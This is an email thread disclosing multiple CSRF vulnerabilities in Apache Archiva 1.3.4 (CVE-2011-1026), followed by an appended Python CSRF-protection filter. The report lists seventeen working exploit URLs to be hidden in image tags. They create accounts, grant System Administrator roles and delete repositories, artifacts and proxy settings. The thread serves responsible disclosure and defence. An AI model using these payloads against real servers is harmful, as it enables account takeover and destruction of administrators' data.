Thanks for reporting this, however, it should have been sent/reported
to security@ first. I've forwarded this to the correct list and the
CVE-ID is CVE-2011-1026. The CSRF issues aren't considered absolutely
critical but we're already working on the fix and will schedule
another release as soon as possible.

-Deng

On Mon, Feb 28, 2011 at 3:31 PM, Walikar Riyaz Ahemed Dawalmalik
<[email protected]> wrote:
> Hi,
>
> The latest version of Archiva (1.3.4) is also vulnerable to multiple
> CSRF issues. The following are the details and exploit code. Please
> confirm this mail and revert with an update. I will be disclosing this
> to the security community after the issues have been fixed.
>
> Project: Archiva
> Severity: Critical
> Versions: 1.3.4 (other versions may be affected)
> Exploit type: Multiple CSRF
>
> CSRF:
>
> An attacker can build a simple html page containing a hidden Image tag
> (eg: <img src=vulnurl width=0 height=0 />) and entice the administrator
> to access the page resulting in the following issues:
>
> 1. An attacker can create a new user using the administrator's session:
> http://127.0.0.1:8080/archiva/security/usercreate!submit.action?user.username=tester123&user.fullName=test&user.email=test%40test.com&user.password=abc&user.confirmPassword=abc
>
> 2. An attacker can delete a user:
> http://127.0.0.1:8080/archiva/security/userdelete!submit.action?username=test
>
> 3. An attacker can elevate privileges of accounts:
> http://127.0.0.1:8080/archiva/security/addRolesToUser.action?principal=test&addRolesButton=true&__checkbox_addNDSelectedRoles=Guest&__checkbox_addNDSelectedRoles=Registered+User&addNDSelectedRoles=System+Administrator&__checkbox_addNDSelectedRoles=System+Administrator&__checkbox_addNDSelectedRoles=User+Administrator&__checkbox_addNDSelectedRoles=Global+Repository+Manager&__checkbox_addNDSelectedRoles=Global+Repository+Observer&submitRolesButton=Submit
>
> 4. An attacker can delete the Configuration and contents along with the
> repository:
> http://127.0.0.1:8080/archiva/admin/deleteRepository.action?repoid=test&method%3AdeleteContents=Delete+Configuration+and+Contents
>
> 5. An attacker can delete an artifact from any repository:
> http://127.0.0.1:8080/archiva/deleteArtifact!doDelete.action?groupId=1&artifactId=1&version=1&repositoryId=snapshots
>
> 6. An attacker can add a Repository Group:
> http://127.0.0.1:8080/archiva/admin/addRepositoryGroup.action?repositoryGroup.id=csrfgrp
>
> 7. An attacker can delete a repository Group:
> http://127.0.0.1:8080/archiva/admin/deleteRepositoryGroup.action?repoGroupId=test&method%3Adelete=Confirm
>
> 8. An attacker can disable Proxy connectors:
> http://127.0.0.1:8080/archiva/admin/disableProxyConnector!disable.action?target=maven2-repository.dev.java.net&source=internal
>
> 9. An attacker can Delete proxy connectors:
> http://127.0.0.1:8080/archiva/admin/deleteProxyConnector!delete.action?target=maven2-repository.dev.java.net&source=snapshots
>
> 10. An attacker can delete Legacy Artifact Path under Legacy Support:
> http://127.0.0.1:8080/archiva/admin/deleteLegacyArtifactPath.action?path=jaxen%2Fjars%2Fjaxen-1.0-FCS-full.jar
>
> 11. An attacker can create a New Network Proxy configuration:
> http://127.0.0.1:8080/archiva/admin/saveNetworkProxy.action?mode=add&proxy.id=ntwrk&proxy.protocol=http&proxy.host=test&proxy.port=8080&proxy.username=&proxy.password=
>
> 12. An attacker can delete an existing network proxy configuration:
> http://127.0.0.1:8080/archiva/admin/deleteNetworkProxy!delete.action?proxyid=myproxy
>
> 13. An attacker can add custom file extensions to the repository
> scanning page:
> http://127.0.0.1:8080/archiva/admin/repositoryScanning!addFiletypePattern.action?pattern=**%2F*.rum&fileTypeId=artifacts
>
> 14. An attacker can remove an existing file extension from the
> repository scanning page:
> http://127.0.0.1:8080/archiva/admin/repositoryScanning!removeFiletypePattern.action?pattern=**%2F*.rum&fileTypeId=artifacts
>
> 15. An attacker can change the settings on the Known Consumers section:
> http://127.0.0.1:8080/archiva/admin/repositoryScanning!updateKnownConsumers.action?enabledKnownContentConsumers=auto-remove&enabledKnownContentConsumers=auto-rename&enabledKnownContentConsumers=create-missing-checksums&enabledKnownContentConsumers=index-content&enabledKnownContentConsumers=metadata-updater&enabledKnownContentConsumers=repository-purge&enabledKnownContentConsumers=update-db-artifact&enabledKnownContentConsumers=validate-checksums
>
> 16. An attacker can enable/disable Unprocessed Consumer settings:
> http://127.0.0.1:8080/archiva/admin/database!updateUnprocessedConsumers.action?enabledUnprocessedConsumers=update-db-project
>
> 17. An attacker can change settings on the Cleanup Consumers section:
> http://127.0.0.1:8080/archiva/admin/database!updateCleanupConsumers.action?enabledCleanupConsumers=not-present-remove-db-artifact&enabledCleanupConsumers=not-present-remove-db-project&enabledCleanupConsumers=not-present-remove-indexed
>
>
> I would request you to provide CVE-IDs for the vulnerabilities so that I
> can co-ordinate a full disclosure after these issues are fixed.
>
> Warm Regards,
> Riyaz Ahemed Walikar || Senior Engineer - Professional Services
> Vulnerability Assessment & Penetration Testing
> Mobile: +91-98860-42242 || Extn: 5601
>
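A defender-side check for the pattern reported above, added here as an illustration and not Archiva's own fix: a request gate that refuses GET-driven calls to the state-changing action paths (which is all an image tag can issue) and requires a per-session synchronizer token plus a same-site Origin on POSTs. The token field name, the path grouping and the session values are assumptions for this example.

```python
import hmac
import hashlib
from typing import Dict, Optional, Tuple
from urllib.parse import urlsplit

# Path prefixes of the state-changing actions listed in the report
# (assumed grouping for this example, not Archiva configuration).
STATE_CHANGING_PREFIXES = ("/archiva/security/", "/archiva/admin/",
                           "/archiva/deleteArtifact")
SITE_HOST = "127.0.0.1:8080"  # host used in the report's proof-of-concept URLs


def issue_token(session_secret: bytes, session_id: str) -> str:
    """Per-session synchronizer token: HMAC of the session id under a
    server-side secret. Embed it as a hidden field in every admin form."""
    return hmac.new(session_secret, session_id.encode(), hashlib.sha256).hexdigest()


def is_state_changing(path: str) -> bool:
    """Any .action under the admin/security/delete paths changes state."""
    return path.endswith(".action") and path.startswith(STATE_CHANGING_PREFIXES)


def check_request(method: str, url: str, form: Dict[str, str], session_id: str,
                  session_secret: bytes, origin: Optional[str] = None) -> Tuple[bool, str]:
    """Gate a request the way a CSRF filter in front of the actions would.
    Returns (allowed, reason); all values are constructed by the caller."""
    path = urlsplit(url).path
    if not is_state_changing(path):
        return True, "read-only path, no token required"
    # An <img src=...> can only issue a GET; state changes must arrive by POST.
    if method.upper() != "POST":
        return False, "state-changing action requires POST"
    # Browsers attach Origin to cross-site POSTs; a foreign origin is rejected.
    if origin is not None and urlsplit(origin).netloc != SITE_HOST:
        return False, "cross-origin request rejected"
    # The attacker's page cannot read the victim's token, so it cannot supply it.
    expected = issue_token(session_secret, session_id)
    supplied = form.get("csrf_token", "")
    if not hmac.compare_digest(supplied, expected):
        return False, "missing or invalid CSRF token"
    return True, "accepted"
```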
